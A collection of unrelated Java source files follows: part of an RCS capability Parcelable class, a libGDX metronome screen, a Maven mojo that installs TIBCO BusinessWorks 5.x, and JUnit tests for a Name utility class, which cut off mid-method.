}
/**
* Sets IM as supported or not supported.
*/
public void setImSupported(boolean imSupported) {
this.mImSupported = imSupported;
}
/**
* Checks whether FT Thumbnail is supported.
*/
public boolean isFtThumbSupported() {
return mFtThumbSupported;
}
/**
* Sets FT thumbnail as supported or not supported.
*/
public void setFtThumbSupported(boolean ftThumbSupported) {
this.mFtThumbSupported = ftThumbSupported;
}
/**
* Checks whether FT Store and Forward is supported
*/
public boolean isFtSnFSupported() {
return mFtSnFSupported;
}
/**
* Sets FT Store and Forward as supported or not supported.
*/
public void setFtSnFSupported(boolean ftSnFSupported) {
this.mFtSnFSupported = ftSnFSupported;
}
/**
* Checks whether File transfer HTTP is supported.
*/
public boolean isFtHttpSupported() {
return mFtHttpSupported;
}
/**
* Sets File transfer HTTP as supported or not supported.
*/
public void setFtHttpSupported(boolean ftHttpSupported) {
this.mFtHttpSupported = ftHttpSupported;
}
/**
* Checks whether FT is supported.
*/
public boolean isFtSupported() {
return mFtSupported;
}
/**
* Sets FT as supported or not supported.
*/
public void setFtSupported(boolean ftSupported) {
this.mFtSupported = ftSupported;
}
/**
* Checks whether IS is supported.
*/
public boolean isIsSupported() {
return mIsSupported;
}
/**
* Sets IS as supported or not supported.
*/
public void setIsSupported(boolean isSupported) {
this.mIsSupported = isSupported;
}
/**
* Checks whether video sharing is supported during a CS call.
*/
public boolean isVsDuringCSSupported() {
return mVsDuringCSSupported;
}
/**
* Sets video sharing as supported or not supported during a CS
* call.
*/
public void setVsDuringCSSupported(boolean vsDuringCSSupported) {
this.mVsDuringCSSupported = vsDuringCSSupported;
}
/**
* Checks whether video sharing outside a voice call is
* supported.
*/
public boolean isVsSupported() {
return mVsSupported;
}
/**
* Sets video sharing as supported or not supported.
*/
public void setVsSupported(boolean vsSupported) {
this.mVsSupported = vsSupported;
}
/**
* Checks whether social presence is supported.
*/
public boolean isSpSupported() {
return mSpSupported;
}
/**
* Sets social presence as supported or not supported.
*/
public void setSpSupported(boolean spSupported) {
this.mSpSupported = spSupported;
}
/**
* Checks whether capability discovery via presence is
* supported.
*/
public boolean isCdViaPresenceSupported() {
return mCdViaPresenceSupported;
}
/**
* Sets capability discovery via presence as supported or not
* supported.
*/
public void setCdViaPresenceSupported(boolean cdViaPresenceSupported) {
this.mCdViaPresenceSupported = cdViaPresenceSupported;
}
/**
* Checks whether IP voice call is supported.
*/
public boolean isIpVoiceSupported() {
return mIpVoiceSupported;
}
/**
* Sets IP voice call as supported or not supported.
*/
public void setIpVoiceSupported(boolean ipVoiceSupported) {
this.mIpVoiceSupported = ipVoiceSupported;
}
/**
* Checks whether IP video call is supported.
*/
public boolean isIpVideoSupported() {
return mIpVideoSupported;
}
/**
* Sets IP video call as supported or not supported.
*/
public void setIpVideoSupported(boolean ipVideoSupported) {
this.mIpVideoSupported = ipVideoSupported;
}
/**
* Checks whether Geo location Pull using File Transfer is
* supported.
*/
public boolean isGeoPullFtSupported() {
return mGeoPullFtSupported;
}
/**
* Sets Geo location Pull using File Transfer as supported or
* not supported.
*/
public void setGeoPullFtSupported(boolean geoPullFtSupported) {
this.mGeoPullFtSupported = geoPullFtSupported;
}
/**
* Checks whether Geo Pull is supported.
*/
public boolean isGeoPullSupported() {
return mGeoPullSupported;
}
/**
* Sets Geo Pull as supported or not supported.
*/
public void setGeoPullSupported(boolean geoPullSupported) {
this.mGeoPullSupported = geoPullSupported;
}
/**
* Checks whether Geo Push is supported.
*/
public boolean isGeoPushSupported() {
return mGeoPushSupported;
}
/**
* Sets Geo Push as supported or not supported.
*/
public void setGeoPushSupported(boolean geoPushSupported) {
this.mGeoPushSupported = geoPushSupported;
}
/**
* Checks whether short messaging is supported.
*/
public boolean isSmSupported() {
return mSmSupported;
}
/**
* Sets short messaging as supported or not supported.
*/
public void setSmSupported(boolean smSupported) {
this.mSmSupported = smSupported;
}
/**
* Checks whether store/forward and group chat are supported.
*/
public boolean isFullSnFGroupChatSupported() {
return mFullSnFGroupChatSupported;
}
public boolean isRcsIpVoiceCallSupported() {
return mRcsIpVoiceCallSupported;
}
public boolean isRcsIpVideoCallSupported() {
return mRcsIpVideoCallSupported;
}
public boolean isRcsIpVideoOnlyCallSupported() {
return mRcsIpVideoOnlyCallSupported;
}
/**
* Sets store/forward and group chat supported or not supported.
*/
public void setFullSnFGroupChatSupported(boolean fullSnFGroupChatSupported) {
this.mFullSnFGroupChatSupported = fullSnFGroupChatSupported;
}
public void setRcsIpVoiceCallSupported(boolean rcsIpVoiceCallSupported) {
this.mRcsIpVoiceCallSupported = rcsIpVoiceCallSupported;
}
public void setRcsIpVideoCallSupported(boolean rcsIpVideoCallSupported) {
this.mRcsIpVideoCallSupported = rcsIpVideoCallSupported;
}
public void setRcsIpVideoOnlyCallSupported(boolean rcsIpVideoOnlyCallSupported) {
this.mRcsIpVideoOnlyCallSupported = rcsIpVideoOnlyCallSupported;
}
/** Gets the list of supported extensions. */
public String[] getExts() {
return mExts;
}
/** Sets the list of supported extensions. */
public void setExts(String[] exts) {
this.mExts = exts;
}
/** Gets the time stamp for when to query again. */
public long getCapTimestamp() {
return mCapTimestamp;
}
/** Sets the time stamp for when to query again. */
public void setCapTimestamp(long capTimestamp) {
this.mCapTimestamp = capTimestamp;
}
public int describeContents() {
// TODO Auto-generated method stub
return 0;
}
public void writeToParcel(Parcel dest, int flags) {
dest.writeInt(mImSupported ? 1 : 0);
dest.writeInt(mFtSupported ? 1 : 0);
dest.writeInt(mFtThumbSupported ? 1 : 0);
dest.writeInt(mFtSnFSupported ? 1 : 0);
dest.writeInt(mFtHttpSupported ? 1 : 0);
dest.writeInt(mIsSupported ? 1 : 0);
dest.writeInt(mVsDuringCSSupported ? 1 : 0);
dest.writeInt(mVsSupported ? 1 : 0);
dest.writeInt(mSpSupported ? 1 : 0);
dest.writeInt(mCdViaPresenceSupported ? 1 : 0);
dest.writeInt(mIpVoiceSupported ? 1 : 0);
dest.writeInt(mIpVideoSupported ? 1 : 0);
dest.writeInt(mGeoPullFtSupported ? 1 : 0);
dest.writeInt(mGeoPullSupported ? 1 : 0);
dest.writeInt(mGeoPushSupported ? 1 : 0);
dest.writeInt(mSmSupported ? 1 : 0);
dest.writeInt(mFullSnFGroupChatSupported ? 1 : 0);
dest.writeInt(mRcsIpVoiceCallSupported ? 1 : 0);
dest.writeInt(mRcsIpVideoCallSupported ? 1 : 0);
dest.writeInt(mRcsIpVideoOnlyCallSupported ? 1 : 0);
dest.writeStringArray(mExts);
dest.writeLong(mCapTimestamp);
}
public static final Parcelable.Creator<CapInfo> CREATOR = new Parcelable.Creator<CapInfo>() {
public CapInfo createFromParcel(Parcel source) {
return new CapInfo(source);
}
public CapInfo[] newArray(int size) {
return new CapInfo[size];
}
};
private CapInfo(Parcel source) {
readFromParcel(source);
}
public void readFromParcel(Parcel source) {
mImSupported = (source.readInt() == 0) ? false : true;
mFtSupported = (source.readInt() == 0) ? false : true;
mFtThumbSupported = (source.readInt() == 0) ? false : true;
mFtSnFSupported = (source.readInt() == 0) ? false : true;
mFtHttpSupported = (source.readInt() == 0) ? false : true;
mIsSupported = (source.readInt() == 0) ? false : true;
mVsDuringCSSupported = (source.readInt() == 0) ? false : true;
mVsSupported = (source.readInt() == 0) ? false : true;
mSpSupported = (source.readInt() == 0) ? false : true;
mCdViaPresenceSupported = (source.readInt() == 0) ? false : true;
mIpVoiceSupported = (source.readInt() == 0) ? false : true;
mIpVideoSupported = (source.readInt() == 0) ? false : true;
mGeoPullFtSupported = (source.readInt() == 0) ? false : true;
mGeoPullSupported = (source.readInt() == 0) ? false : true;
mGeoPushSupported = (source.readInt() == 0) ? false : true;
mSmSupported = (source.readInt() == 0) ? false : true;
mFullSnFGroupChatSupported = (source.readInt() == 0) ? false : true;
mRcsIpVoiceCallSupported = (source.readInt() == 0) ? false : true;
mRcsIpVideoCallSupported = (source.readInt() == 0) ? false : true;
mRcsIpVideoOnlyCallSupported = (source.readInt() == 0) ? false : true;
mExts = source.createStringArray();
mCapTimestamp = source.readLong();
}
}
|
|
package com.inja.tempogdx.screens;
import com.badlogic.gdx.Gdx;
import com.badlogic.gdx.Screen;
import com.badlogic.gdx.math.Interpolation;
import com.badlogic.gdx.math.MathUtils;
import com.badlogic.gdx.scenes.scene2d.Action;
import com.badlogic.gdx.scenes.scene2d.Actor;
import com.badlogic.gdx.scenes.scene2d.InputEvent;
import com.badlogic.gdx.scenes.scene2d.Stage;
import com.badlogic.gdx.scenes.scene2d.actions.Actions;
import com.badlogic.gdx.scenes.scene2d.ui.*;
import com.badlogic.gdx.scenes.scene2d.utils.ActorGestureListener;
import com.badlogic.gdx.scenes.scene2d.utils.ChangeListener;
import com.badlogic.gdx.scenes.scene2d.utils.ClickListener;
import com.badlogic.gdx.utils.Array;
import com.badlogic.gdx.utils.viewport.Viewport;
import com.inja.tempogdx.Constants;
import com.inja.tempogdx.metronome.BeatEventListener;
import com.inja.tempogdx.metronome.Metronome;
import com.inja.tempogdx.metronome.TapTempoCalculator;
import com.inja.tempogdx.utilities.Assets;
import com.inja.tempogdx.metronome.BpmNameConverter;
import com.inja.tempogdx.utilities.SkinFactory;
public class MainScreen implements Screen {
private final Stage stage;
private final Metronome metronome;
private final TapTempoCalculator tapTempoCalculator;
private ImageButton startButton;
private Slider slider;
private Label bpmLabel;
private Label bpmNameLabel;
private Array<Image> beatIndicators = new Array<>();
private int currentBeatIndicator = -1;
private MainScreenDelegate delegate;
private Table table;
private boolean firstShow = true;
private ImageButton infoButton;
private Integer margin;
public MainScreen(Viewport viewport, MainScreenDelegate delegate) {
this.delegate = delegate;
metronome = new Metronome();
tapTempoCalculator = new TapTempoCalculator(Constants.NUMBER_OF_TAPS, Constants.MIN_BPM);
stage = new Stage(viewport);
createLayout();
}
private void createLayout() {
Skin skin = SkinFactory.create();
int buttonHeight = skin.get("button-height", Integer.class);
margin = skin.get("margin", Integer.class);
final int uiWidth = skin.get("ui-width", Integer.class);
//Main Table
table = new Table(skin);
stage.addActor(table);
table.center();
table.setWidth(uiWidth);
table.setHeight(stage.getHeight());
table.setX(stage.getWidth() / 2 - table.getWidth() / 2);
//BPM Table
Table bpmTable = new Table();
bpmTable.background(skin.getDrawable("list"));
bpmLabel = new Label(Integer.toString(metronome.getBpm()), skin, "big");
bpmTable.add(bpmLabel).height(20).padTop(margin).row();
bpmNameLabel = new Label(BpmNameConverter.getName(metronome.getBpm()), skin, "small");
bpmTable.add(bpmNameLabel).padTop(margin);
table.add(bpmTable).colspan(2).height(120).fillX().expandX().row();
//Tap Tempo Button
ImageButton tapButton = new ImageButton(skin, "tap");
tapButton.addListener(new ActorGestureListener(){
@Override
public void touchDown(InputEvent event, float x, float y, int pointer, int button) {
Integer bpm = tapTempoCalculator.tap();
if (bpm != null) setBpm(bpm);
}
});
table.add(tapButton).colspan(2).height(buttonHeight).padTop(margin).fillX().expandX().row();
//Tempo Slider
slider = new Slider(Constants.MIN_BPM, Constants.MAX_BPM, 1, false, skin);
slider.setValue(metronome.getBpm());
slider.setWidth(stage.getWidth() - 20);
slider.addListener(new ChangeListener() {
@Override
public void changed(ChangeEvent event, Actor actor) {
setBpm((int) slider.getValue());
}
});
table.add(slider).padTop(margin).colspan(2).fillX().expandX().row();
//Increase/Decrease Buttons
final ImageButton slowerButton = new ImageButton(skin, "slower");
slowerButton.addListener(new MetronomeButtonGestureListener(-Constants.BIG_INCREMENT, -1));
table.add(slowerButton).height(buttonHeight).padTop(margin).padRight(10).width((table.getWidth() - 20) / 2);
ImageButton fasterButton = new ImageButton(skin, "faster");
fasterButton.addListener(new MetronomeButtonGestureListener(Constants.BIG_INCREMENT, 1));
table.add(fasterButton).height(buttonHeight).padTop(margin).padLeft(10).width((table.getWidth() - 20) / 2).row();
//Start/Stop Button
startButton = new ImageButton(skin, "play");
startButton.addListener(new ClickListener() {
@Override
public void clicked(InputEvent event, float x, float y) {
toggleMetronome();
}
});
table.add(startButton).height(buttonHeight).padTop(20).colspan(2).fillX().expandX().row();
//Beat Indicator
Table indicatorTable = new Table();
indicatorTable.background(skin.getDrawable("list"));
for (int i = 0; i < 4; i++) {
Image image = new Image(Assets.getDrawable("beatOff"));
beatIndicators.add(image);
indicatorTable.add(image).pad(0, margin, 0, margin).width(20).height(20);
}
table.add(indicatorTable).colspan(2).padTop(20).height(50).fillX().expandX().row();
//Info Button
infoButton = new ImageButton(skin, "info");
infoButton.setWidth(40);
infoButton.setHeight(40);
infoButton.setX(stage.getWidth() - margin - infoButton.getWidth());
infoButton.setY(stage.getHeight() - margin - infoButton.getHeight());
infoButton.addListener(new ClickListener() {
@Override
public void clicked(InputEvent event, float x, float y) {
infoButton.addAction(Actions.moveBy(0, margin + infoButton.getHeight(), 0.2f, Interpolation.exp5In));
table.addAction(Actions.sequence(
Actions.moveBy(-stage.getWidth(), 0, 0.2f, Interpolation.exp5In),
new Action() {
@Override
public boolean act(float delta) {
delegate.infoClicked();
return true;
}
}
));
}
});
stage.addActor(infoButton);
//Metronome Beat Event
metronome.addListener(new BeatEventListener() {
@Override
public void onBeat(BeatEvent event) {
if (currentBeatIndicator >= 0 && currentBeatIndicator < beatIndicators.size)
beatIndicators.get(currentBeatIndicator).setDrawable(Assets.getDrawable("beatOff"));
currentBeatIndicator++;
if (currentBeatIndicator == beatIndicators.size) currentBeatIndicator = 0;
Assets.getSound(currentBeatIndicator == 0 ? "clickFirst" : "click").play();
beatIndicators.get(currentBeatIndicator).setDrawable(Assets.getDrawable("beatOn"));
}
});
}
private void toggleMetronome() {
if (startButton.isChecked()) {
startMetronome();
} else {
stopMetronome();
}
}
private void startMetronome() {
metronome.start();
}
private void stopMetronome() {
if (currentBeatIndicator >= 0 && currentBeatIndicator < beatIndicators.size) {
beatIndicators.get(currentBeatIndicator).setDrawable(Assets.getDrawable("beatOff"));
}
currentBeatIndicator = -1;
metronome.stop();
}
private void setBpm(int value) {
value = MathUtils.clamp(value, Constants.MIN_BPM, Constants.MAX_BPM);
metronome.setBpm(value);
slider.setValue(value);
bpmLabel.setText(Integer.toString(metronome.getBpm()));
bpmNameLabel.setText(BpmNameConverter.getName(metronome.getBpm()));
}
@Override
public void show() {
Gdx.input.setInputProcessor(stage);
if (firstShow) {
firstShow = false;
return;
}
table.addAction(Actions.moveBy(stage.getWidth(), 0, 0.2f, Interpolation.exp5Out));
infoButton.addAction(Actions.moveBy(0, -(margin + infoButton.getHeight()), 0.3f, Interpolation.exp5Out));
}
@Override
public void render(float delta) {
stage.act(delta);
stage.draw();
}
@Override
public void resize(int width, int height) {
}
@Override
public void pause() {
stopMetronome();
}
@Override
public void resume() {
}
@Override
public void hide() {
}
@Override
public void dispose() {
stage.dispose();
metronome.stop();
}
private class MetronomeButtonGestureListener extends ActorGestureListener {
private int bigIncrement;
private int smallIncrement;
MetronomeButtonGestureListener(int bigIncrement, int smallIncrement) {
super(20, 0.4f, 0.5f, 0.15f);
this.bigIncrement = bigIncrement;
this.smallIncrement = smallIncrement;
}
public boolean longPress(Actor actor, float x, float y) {
Gdx.input.vibrate(10);
setBpm(metronome.getBpm() + bigIncrement);
return true;
}
public void tap(InputEvent event, float x, float y, int count, int button) {
setBpm(metronome.getBpm() + smallIncrement);
}
}
public interface MainScreenDelegate {
void infoClicked();
}
}
|
|
/**
* (C) Copyright 2016-2017 teecube
* (http://teecu.be) and others.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package t3.toe.installer.installers;
import java.io.File;
import java.util.ArrayList;
import java.util.List;
import java.util.Properties;
import org.apache.maven.plugin.MojoExecutionException;
import org.apache.maven.plugin.MojoFailureException;
import t3.plugin.annotations.Mojo;
import t3.plugin.annotations.Parameter;
import t3.toe.installer.CommonInstaller;
import t3.toe.installer.InstallerMojosInformation;
/**
* <p>
* This goal installs the TIBCO BusinessWorks 5.x product from an official
* archive to a target environment.
* </p>
*
* <p>
* If the target environment already contains the dependencies products
* (RendezVous, TRA), only TIBCO BusinessWorks 5.x is installed, otherwise,
* the plugin will look for the dependencies to install and call corresponding
* goals (see <a href="rv-install-mojo.html">rv-install goal</a> and
* <a href="./tra-install-mojo.html">tra-install goal</a>).
* </p>
*
* @author Mathieu Debove <[email protected]>
*
*/
@Mojo(name = "bw5-install", requiresProject = false)
public class BW5InstallerMojo extends CommonInstaller {
@Parameter(property = InstallerMojosInformation.BW5.installationPackage, defaultValue = "${" + InstallerMojosInformation.installationPackageDirectory + "}/${tibco.bw5.installation.package.regex}")
private File installationPackage;
@Parameter(property = InstallerMojosInformation.BW5.installationPackageRegex, defaultValue = InstallerMojosInformation.BW5.installationPackageRegex_default)
private String installationPackageRegex;
@Parameter(property = InstallerMojosInformation.BW5.installationPackageRegexArchGroupIndex, defaultValue = InstallerMojosInformation.BW5.installationPackageRegexArchGroupIndex_default)
private Integer installationPackageRegexArchGroupIndex;
@Parameter(property = InstallerMojosInformation.BW5.installationPackageRegexOsGroupIndex, defaultValue = InstallerMojosInformation.BW5.installationPackageRegexOsGroupIndex_default)
private Integer installationPackageRegexOsGroupIndex;
@Parameter(property = InstallerMojosInformation.BW5.installationPackageRegexVersionGroupIndex, defaultValue = InstallerMojosInformation.BW5.installationPackageRegexVersionGroupIndex_default)
private Integer installationPackageRegexVersionGroupIndex;
@Parameter(property = InstallerMojosInformation.BW5.installationPackageVersion, defaultValue = "")
private String installationPackageVersion;
@Parameter(property = InstallerMojosInformation.BW5.installationPackageVersionMajorMinor, defaultValue = "")
private String installationPackageVersionMajorMinor;
@Parameter(property = InstallerMojosInformation.BW5.remoteInstallationPackageGroupId, defaultValue = InstallerMojosInformation.BW5.remoteInstallationPackageGroupId_default, description = InstallerMojosInformation.BW5.remoteInstallationPackageGroupId_description)
protected String remoteInstallationPackageGroupId;
@Parameter(property = InstallerMojosInformation.BW5.remoteInstallationPackageArtifactId, defaultValue = InstallerMojosInformation.BW5.remoteInstallationPackageArtifactId_default, description = InstallerMojosInformation.BW5.remoteInstallationPackageArtifactId_description)
protected String remoteInstallationPackageArtifactId;
@Parameter(property = InstallerMojosInformation.BW5.remoteInstallationPackageVersion, defaultValue = "", description = InstallerMojosInformation.BW5.remoteInstallationPackageVersion_description)
protected String remoteInstallationPackageVersion;
@Parameter(property = InstallerMojosInformation.BW5.remoteInstallationPackageClassifier, defaultValue = "", description = InstallerMojosInformation.BW5.remoteInstallationPackageClassifier_description)
protected String remoteInstallationPackageClassifier;
@Override
public List<String> getDependenciesGoals() {
List<String> dependenciesGoals = new ArrayList<String>();
dependenciesGoals.add(InstallerMojosInformation.pluginPrefix + "rv-install");
dependenciesGoals.add(InstallerMojosInformation.pluginPrefix + "tra-install");
return dependenciesGoals;
}
@Override
public void execute() throws MojoExecutionException, MojoFailureException {
if (getCreateNewEnvironment()) {
_isDependency = true;
// need to find dependencies
installRV();
this.createNewEnvironment = false;
_createNewEnvironment = createNewEnvironment; // forward to next dependency
this.removeExistingEnvironment = false;
_removeExistingEnvironment = removeExistingEnvironment;
if (_environmentName != null && this.environmentName == null) {
this.environmentName = _environmentName;
}
installTRA();
}
_isDependency = false;
super.execute();
}
@Override
public File getInstallationPackage() throws MojoExecutionException {
if (installationPackage == null || !installationPackage.exists()) {
installationPackage = findInstallationPackage();
}
return installationPackage;
}
@Override
public String getInstallationPackageRegex() {
return installationPackageRegex;
}
@Override
public Integer getInstallationPackageArchGroupIndex() {
return installationPackageRegexArchGroupIndex;
}
@Override
public Integer getInstallationPackageOsGroupIndex() {
return installationPackageRegexOsGroupIndex;
}
@Override
public Integer getInstallationPackageVersionGroupIndex() {
return installationPackageRegexVersionGroupIndex;
}
@Override
public String getInstallationPackagePropertyName() {
return InstallerMojosInformation.BW5.installationPackage;
}
@Override
public String getInstallationPackageVersionPropertyName() {
return InstallerMojosInformation.BW5.installationPackageVersion;
}
@Override
public String getInstallationPackageVersionMajorMinorPropertyName() {
return InstallerMojosInformation.BW5.installationPackageVersionMajorMinor;
}
@Override
public String getInstallationPackageArchPropertyName() {
return InstallerMojosInformation.BW6.installationPackageArch;
}
@Override
public String getInstallationPackageOsPropertyName() {
return InstallerMojosInformation.BW6.installationPackageOs;
}
@Override
public String getInstallationPackageVersionMajorMinor() {
return installationPackageVersionMajorMinor;
}
@Override
public void setInstallationPackageVersionMajorMinor(String version) {
this.installationPackageVersionMajorMinor = version;
}
@Override
public String getRemotePackageGroupId() {
return remoteInstallationPackageGroupId;
}
@Override
public String getRemotePackageArtifactId() {
return remoteInstallationPackageArtifactId;
}
@Override
public String getRemotePackageVersion() {
return remoteInstallationPackageVersion;
}
@Override
public String getRemotePackageClassifier() {
return remoteInstallationPackageClassifier;
}
@Override
public boolean hasDependencies() {
return true;
}
@Override
public boolean dependenciesExist() throws MojoExecutionException {
return getInstallationRoot() != null && getInstallationRoot().exists() && new File(getInstallationRoot(), "tra").exists();
}
@Override
public boolean installationExists() throws MojoExecutionException {
return getInstallationRoot() != null && getInstallationRoot().exists() && new File(getInstallationRoot(), "bw/" + getInstallationPackageVersionMajorMinor()).exists();
}
@Override
public void setProperties(Properties props) {
if (props == null) {
return;
}
}
@Override
public String getProductName() {
return "TIBCO BusinessWorks 5.x";
}
}
|
|
package test.integration;
import static java.util.Arrays.asList;
import static java.util.Collections.emptyList;
import static java.util.Collections.singletonList;
import static org.junit.jupiter.api.Assertions.assertEquals;
import static org.junit.jupiter.api.Assertions.assertFalse;
import static org.junit.jupiter.api.Assertions.assertNull;
import static org.junit.jupiter.api.Assertions.assertSame;
import static org.junit.jupiter.api.Assertions.assertThrows;
import static org.junit.jupiter.api.Assertions.assertTrue;
import com.github.sormuras.beethoven.Compilation;
import com.github.sormuras.beethoven.Name;
import java.math.BigInteger;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;
import java.util.Objects;
import java.util.Set;
import javax.annotation.processing.AbstractProcessor;
import javax.annotation.processing.RoundEnvironment;
import javax.annotation.processing.SupportedAnnotationTypes;
import javax.annotation.processing.SupportedSourceVersion;
import javax.lang.model.SourceVersion;
import javax.lang.model.element.TypeElement;
import javax.tools.JavaFileObject;
import org.junit.jupiter.api.Test;
class NameTests {
@SupportedAnnotationTypes({"X", "x.X"})
@SupportedSourceVersion(SourceVersion.RELEASE_8)
static class ElementNameProcessor extends AbstractProcessor {
final List<Name> all = new ArrayList<>();
@Override
public boolean process(Set<? extends TypeElement> annotations, RoundEnvironment roundEnv) {
TypeElement tex = processingEnv.getElementUtils().getTypeElement("X");
if (tex != null) {
roundEnv.getElementsAnnotatedWith(tex).forEach(e -> all.add(Name.name(e)));
}
tex = processingEnv.getElementUtils().getTypeElement("x.X");
if (tex != null) {
roundEnv.getElementsAnnotatedWith(tex).forEach(e -> all.add(Name.name(e)));
}
return false;
}
}
@Test
void array() {
assertEquals("", Name.name(int[][].class).packageName());
assertEquals("int[][]", Name.name(int[][].class).canonical());
assertEquals("int[][]", Name.name(int[][].class).simpleNames());
assertEquals("java.lang", Name.name(Byte[][].class).packageName());
assertEquals("java.lang.Byte[][]", Name.name(Byte[][].class).canonical());
assertEquals("Byte[][]", Name.name(Byte[][].class).simpleNames());
}
@Test
void cast() throws Exception {
Name name = Name.reflect(Objects.class, "hash");
assertNull(Name.cast(null));
assertSame(name, Name.cast(name));
assertEquals(Name.name(Object.class), Name.cast(Object.class));
assertEquals(Name.name(Thread.State.BLOCKED), Name.cast(Thread.State.BLOCKED));
assertEquals(Name.name("abc", "X"), Name.cast(new String[] {"abc", "X"}));
assertEquals(Name.name("abc", "X"), Name.cast(asList("abc", "X")));
assertEquals(Name.name(Math.class.getField("PI")), Name.cast(Math.class.getField("PI")));
assertThrows(IllegalArgumentException.class, () -> Name.cast(BigInteger.ZERO));
}
@Test
void elementInUnnamedPackage() {
JavaFileObject a = Compilation.source("A", "@X class A {}");
JavaFileObject x = Compilation.source("X", "@interface X {}");
ElementNameProcessor p = new ElementNameProcessor();
Compilation.compile(null, emptyList(), singletonList(p), asList(a, x));
assertEquals(1, p.all.size());
assertEquals(Name.name("A"), p.all.get(0));
}
@Test
void elementInNamedPackage() {
JavaFileObject a = Compilation.source("x.A", "package x; @x.X class A {}");
JavaFileObject x = Compilation.source("x.X", "package x; @interface X {}");
ElementNameProcessor p = new ElementNameProcessor();
Compilation.compile(null, emptyList(), singletonList(p), asList(a, x));
assertEquals(1, p.all.size());
assertEquals(Name.name("x", "A"), p.all.get(0));
}
@Test
void enclosed() {
Name.name(void.class);
Name state = Name.name(Thread.State.class);
assertEquals("java.lang.Thread.State", state.canonical());
assertTrue(state.isEnclosed());
assertTrue(state.isJavaLangPackage());
Name thread = state.enclosing();
assertEquals("java.lang.Thread", thread.canonical());
assertTrue(thread.isEnclosed());
assertTrue(state.isJavaLangPackage());
Name lang = thread.enclosing();
assertEquals("java.lang", lang.canonical());
assertTrue(lang.isEnclosed());
assertTrue(state.isJavaLangPackage());
Name java = lang.enclosing();
assertEquals("java", java.canonical());
assertFalse(java.isEnclosed());
assertFalse(java.isJavaLangPackage());
assertThrows(IllegalStateException.class, java::enclosing);
}
@Test
void field() {
assertEquals("java.lang.Math.PI", Name.reflect(Math.class, "PI").canonical());
assertThrows(Error.class, () -> Name.reflect(Object.class, "PI"));
assertThrows(Error.class, () -> Name.reflect(Class.class, "PO"));
}
@Test
void equalsAndHashcode() {
assertEquals(Name.name(byte.class), new Name(0, singletonList("byte")));
assertEquals(Name.name(Object.class), Name.name("java", "lang", "Object"));
assertEquals(Name.name(Objects.class), Name.name("java", "util", "Objects"));
assertEquals(Name.name(Thread.class), Name.name("java", "lang", "Thread"));
assertEquals(Name.name(Thread.State.class), Name.name("java", "lang", "Thread", "State"));
// same instance
Name integer = Name.name(int.class);
assertEquals(integer, integer);
// falsify
// noinspection ObjectEqualsNull
assertFalse(Name.name(byte.class).equals(null));
Object byteClass = byte.class; // bypass EqualsBetweenInconvertibleTypes "error"
assertFalse(Name.name(byte.class).equals(byteClass));
assertFalse(Name.name(byte.class).equals(new Name(0, asList("some", "byte"))));
}
@Test
void name() {
assertEquals("A", Name.name("A").canonical());
assertEquals("", Name.name("A").packageName());
assertEquals("A", Name.name("A").simpleNames());
assertEquals("A", Name.name("A").lastName());
assertEquals(1, Name.name("A").size());
assertEquals("a", Name.name("a").canonical());
assertEquals("a", Name.name("a").packageName());
assertEquals("", Name.name("a").simpleNames());
assertEquals("a", Name.name("a").lastName());
assertEquals("not present", Name.name("a").topLevelName().orElse("not present"));
assertEquals("a.b", Name.name("a", "b").canonical());
assertEquals("a.b", Name.name("a", "b").packageName());
assertEquals("", Name.name("a", "b").simpleNames());
assertEquals("b", Name.name("a", "b").lastName());
assertEquals("a.b.C", Name.name("a", "b", "C").canonical());
assertEquals("a.b", Name.name("a", "b", "C").packageName());
assertEquals("C", Name.name("a", "b", "C").simpleNames());
assertEquals("C", Name.name("a", "b", "C").lastName());
assertEquals(3, Name.name("a", "b", "C").size());
assertEquals("java.lang.Object", Name.name(Object.class).canonical());
assertEquals("java.lang", Name.name(Object.class).packageName());
assertEquals("Object", Name.name(Object.class).simpleNames());
assertEquals("Object", Name.name(Object.class).lastName());
assertEquals("Object", Name.name(Object.class).topLevelName().orElse("FAIL!"));
assertTrue(Name.name(Object.class).isJavaLangObject());
assertEquals("java.lang.Thread.State.NEW", Name.name(Thread.State.NEW).canonical());
assertEquals("java.lang", Name.name(Thread.State.NEW).packageName());
assertEquals("Thread.State.NEW", Name.name(Thread.State.NEW).simpleNames());
assertEquals("NEW", Name.name(Thread.State.NEW).lastName());
assertEquals("Thread", Name.name(Thread.State.NEW).topLevelName().orElse("FAIL!"));
assertFalse(Name.name(Thread.State.NEW).isJavaLangObject());
assertEquals(5, Name.name(Thread.State.NEW).size());
assertEquals("a.b.C", Name.name("a", "b", "C").canonical());
assertEquals("a.b.C", Name.name("a.b.C").canonical());
assertThrows(AssertionError.class, () -> new Name(-1, singletonList("a")));
assertThrows(AssertionError.class, () -> new Name(2, singletonList("a")));
}
@Test
void nameOfLocalClass() {
class Local {}
assertEquals("Local", Name.name(Local.class).canonical());
assertEquals("", Name.name(Local.class).packageName());
assertEquals("Local", Name.name(Local.class).simpleNames());
assertEquals("Local", Name.name(Local.class).lastName());
assertEquals("Local", Name.name(Local.class).topLevelName().orElse("FAIL!"));
}
@Test
void nameOfAnonymousClassFails() {
assertThrows(IllegalArgumentException.class, () -> Name.name(new Cloneable() {}.getClass()));
}
@Test
void primitive() {
assertEquals("boolean", Name.name(boolean.class).canonical());
assertEquals("byte", Name.name(byte.class).canonical());
assertEquals("char", Name.name(char.class).canonical());
assertEquals("double", Name.name(double.class).canonical());
assertEquals("float", Name.name(float.class).canonical());
assertEquals("int", Name.name(int.class).canonical());
assertEquals("long", Name.name(long.class).canonical());
assertEquals("short", Name.name(short.class).canonical());
assertEquals("void", Name.name(void.class).canonical());
}
@Test
void string() {
assertEquals("Name{/void}", Name.name(void.class).toString());
assertEquals("Name{/int}", Name.name(int.class).toString());
assertEquals("Name{/int[]}", Name.name(int[].class).toString());
assertEquals("Name{/int[][]}", Name.name(int[][].class).toString());
assertEquals("Name{java.lang/Thread.State[]}", Name.name(Thread.State[].class).toString());
assertEquals("Name{java.lang/Thread.State.NEW}", Name.name(Thread.State.NEW).toString());
}
@Test
void memberRef() {
assertTrue(Name.name(Arrays.asList("a", "b", "C", "d")).isMemberReference());
assertTrue(Name.name(Arrays.asList("a", "b", "C", "D")).isMemberReference());
